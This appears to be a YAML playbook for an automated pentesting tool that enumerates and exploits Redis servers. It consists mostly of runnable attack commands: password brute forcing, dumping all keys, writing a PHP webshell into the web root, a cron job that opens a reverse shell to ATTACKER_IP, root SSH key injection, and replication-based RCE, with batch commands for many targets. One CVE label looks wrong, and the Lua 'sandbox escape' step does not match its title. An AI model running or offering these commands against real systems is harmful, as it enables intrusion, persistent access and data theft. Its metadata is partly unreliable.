id: redis_pentesting
name: Redis Penetration Testing (Port 6379)
description: Comprehensive Redis enumeration, exploitation, and post-exploitation based on HackTricks methodology
category: enumeration
risk_level: critical
batch_compatible: true

triggers:
  - id: trigger_redis_service
    type: asset_discovered
    asset_type: service
    required_properties:
      port: { "$in": [6379, 6380] }
      protocol: { "$in": ["redis", "tcp"] }
    required_count: 1
    priority: 6
    description: Triggers when Redis service is discovered
    deduplication:
      enabled: true
      strategy: signature_based
      signature_fields: ["host", "port"]

steps:
  - id: redis_banner_grab
    name: Redis Banner Grabbing
    description: Identify Redis version and configuration
    order: 1
    timeout_seconds: 30
    commands:
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -sV -p 6379 {host} -oN redis_banner_{host}.txt"
        preferred: true
        notes: "Extract Redis version"
        requires_elevation: false
      - tool: redis-cli
        platforms: [linux, macos, windows]
        command: "redis-cli -h {host} INFO"
        preferred: true
        notes: "Get detailed Redis server information"
        requires_elevation: false
      - tool: nc
        platforms: [linux, macos]
        command: "echo -e 'INFO\\r\\nQUIT\\r\\n' | nc {host} 6379"
        preferred: false
        notes: "Get Redis INFO via netcat"
        requires_elevation: false

  - id: redis_no_auth_test
    name: Redis Unauthenticated Access Test
    description: Test if Redis is accessible without authentication
    order: 2
    timeout_seconds: 60
    commands:
      - tool: redis-cli
        platforms: [linux, macos, windows]
        command: "redis-cli -h {host} ping"
        preferred: true
        notes: "Test unauthenticated access (should return PONG if no auth)"
        requires_elevation: false
      - tool: redis-cli
        platforms: [linux, macos, windows]
        command: "redis-cli -h {host} CONFIG GET requirepass"
        preferred: true
        notes: "Check if password is required"
        requires_elevation: false
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -p 6379 --script redis-info {host}"
        preferred: false
        notes: "Nmap Redis information script"
        requires_elevation: false

  - id: redis_brute_force
    name: Redis Password Brute Force
    description: Brute force Redis AUTH password
    order: 3
    timeout_seconds: 600
    commands:
      - tool: hydra
        platforms: [linux, macos, windows]
        command: "hydra -P /usr/share/wordlists/rockyou.txt redis://{host} -t 4"
        preferred: true
        notes: "Redis password brute forcing"
        requires_elevation: false
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -p 6379 --script redis-brute --script-args redis-brute.timeout=60s {host}"
        preferred: false
        notes: "Nmap Redis brute force script"
        requires_elevation: false
      - tool: metasploit
        platforms: [linux, macos, windows]
        command: "msfconsole -q -x 'use auxiliary/scanner/redis/redis_login; set RHOSTS {host}; set PASS_FILE /usr/share/wordlists/rockyou.txt; run; exit'"
        preferred: false
        notes: "Metasploit Redis login scanner"
        requires_elevation: false

  - id: redis_data_enum
    name: Redis Data Enumeration
    description: Enumerate keys, databases, and sensitive data
    order: 4
    timeout_seconds: 180
    commands:
      - tool: redis-cli
        platforms: [linux, macos, windows]
        command: "redis-cli -h {host} --scan --pattern '*' > redis_keys_{host}.txt"
        preferred: true
        notes: "Dump all Redis keys"
        requires_elevation: false
      - tool: redis-cli
        platforms: [linux, macos, windows]
        command: "redis-cli -h {host} KEYS '*'"
        preferred: true
        notes: "List all keys (WARNING: blocks Redis in production)"
        requires_elevation: false
      - tool: redis-cli
        platforms: [linux, macos, windows]
        command: "redis-cli -h {host} --raw DUMP <key>"
        preferred: false
        notes: "Dump specific key value"
        requires_elevation: false
      - tool: redis-cli
        platforms: [linux, macos, windows]
        command: "for i in {0..15}; do echo \"SELECT $i\\nKEYS *\\n\" | redis-cli -h {host}; done"
        preferred: false
        notes: "Enumerate all 16 default databases"
        requires_elevation: false

  - id: redis_rce_webshell
    name: Redis RCE via Webshell
    description: Exploit Redis to write webshell to web root
    order: 5
    timeout_seconds: 120
    commands:
      - tool: redis-cli
        platforms: [linux, macos, windows]
        command: "redis-cli -h {host} config set dir /var/www/html; config set dbfilename shell.php; set test '<?php system($_GET[\"cmd\"]); ?>'; save"
        preferred: true
        notes: "Write PHP webshell to web root (requires write permissions)"
        requires_elevation: false
      - tool: metasploit
        platforms: [linux, macos, windows]
        command: "msfconsole -q -x 'use exploit/linux/redis/redis_replication_cmd_exec; set RHOSTS {host}; run; exit'"
        preferred: false
        notes: "Redis replication RCE (CVE-2019-15043)"
        requires_elevation: false

  - id: redis_rce_cron
    name: Redis RCE via Cron Job
    description: Exploit Redis to write malicious cron job
    order: 6
    timeout_seconds: 120
    commands:
      - tool: redis-cli
        platforms: [linux, macos]
        command: "redis-cli -h {host} config set dir /var/spool/cron/; config set dbfilename root; set test '\\n* * * * * bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1\\n'; save"
        preferred: true
        notes: "Write reverse shell cron job (requires write to /var/spool/cron)"
        requires_elevation: false

  - id: redis_rce_ssh_key
    name: Redis RCE via SSH Authorized Keys
    description: Exploit Redis to write SSH authorized_keys
    order: 7
    timeout_seconds: 120
    commands:
      - tool: redis-cli
        platforms: [linux, macos]
        command: "redis-cli -h {host} config set dir /root/.ssh/; config set dbfilename authorized_keys; set test '\\n\\nssh-rsa ATTACKER_PUBLIC_KEY\\n\\n'; save"
        preferred: true
        notes: "Write SSH public key to root's authorized_keys (requires write to /root/.ssh)"
        requires_elevation: false

  - id: redis_ssrf
    name: Redis SSRF via Lua Sandbox Escape
    description: Test for SSRF vulnerabilities via Lua scripting
    order: 8
    timeout_seconds: 120
    commands:
      - tool: redis-cli
        platforms: [linux, macos, windows]
        command: "redis-cli -h {host} EVAL \"return redis.call('GET','key')\" 0"
        preferred: true
        notes: "Test Lua script execution"
        requires_elevation: false

  - id: redis_master_slave
    name: Redis Master-Slave Replication Exploit
    description: Exploit master-slave replication for RCE
    order: 9
    timeout_seconds: 180
    commands:
      - tool: redis-cli
        platforms: [linux, macos, windows]
        command: "redis-cli -h {host} SLAVEOF <attacker_ip> 6379"
        preferred: true
        notes: "Force target to become slave of attacker-controlled Redis server"
        requires_elevation: false
      - tool: metasploit
        platforms: [linux, macos, windows]
        command: "msfconsole -q -x 'use exploit/linux/redis/redis_replication_cmd_exec; set RHOSTS {host}; set LHOST <attacker_ip>; run; exit'"
        preferred: true
        notes: "Automated Redis replication RCE"
        requires_elevation: false

  - id: redis_config_dump
    name: Redis Configuration Dump
    description: Dump Redis configuration for security assessment
    order: 10
    timeout_seconds: 60
    commands:
      - tool: redis-cli
        platforms: [linux, macos, windows]
        command: "redis-cli -h {host} CONFIG GET '*' > redis_config_{host}.txt"
        preferred: true
        notes: "Dump all Redis configuration parameters"
        requires_elevation: false
      - tool: redis-cli
        platforms: [linux, macos, windows]
        command: "redis-cli -h {host} INFO ALL > redis_info_all_{host}.txt"
        preferred: true
        notes: "Get comprehensive Redis server information"
        requires_elevation: false

metadata:
  tools:
    - redis-cli
    - nmap
    - hydra
    - metasploit
  cves:
    - CVE-2022-0543  # Lua sandbox escape
    - CVE-2019-15043  # Redis replication RCE
    - CVE-2015-4335  # Redis Lua sandbox escape
  references:
    - https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis
    - https://github.com/n0b0dyCN/redis-rogue-server
    - https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf
  techniques:
    - Unauthenticated access
    - Webshell via CONFIG SET dir
    - Cron job persistence
    - SSH key injection
    - Master-slave replication RCE
    - Lua sandbox escape SSRF
  batch_commands:
    nmap_info: "nmap -p 6379 --script redis-info -iL {targets_file} -oN redis_info.txt"
    redis_cli_info: "parallel -j 10 'redis-cli -h {} INFO > redis_info_{}.txt' :::: {targets_file}"
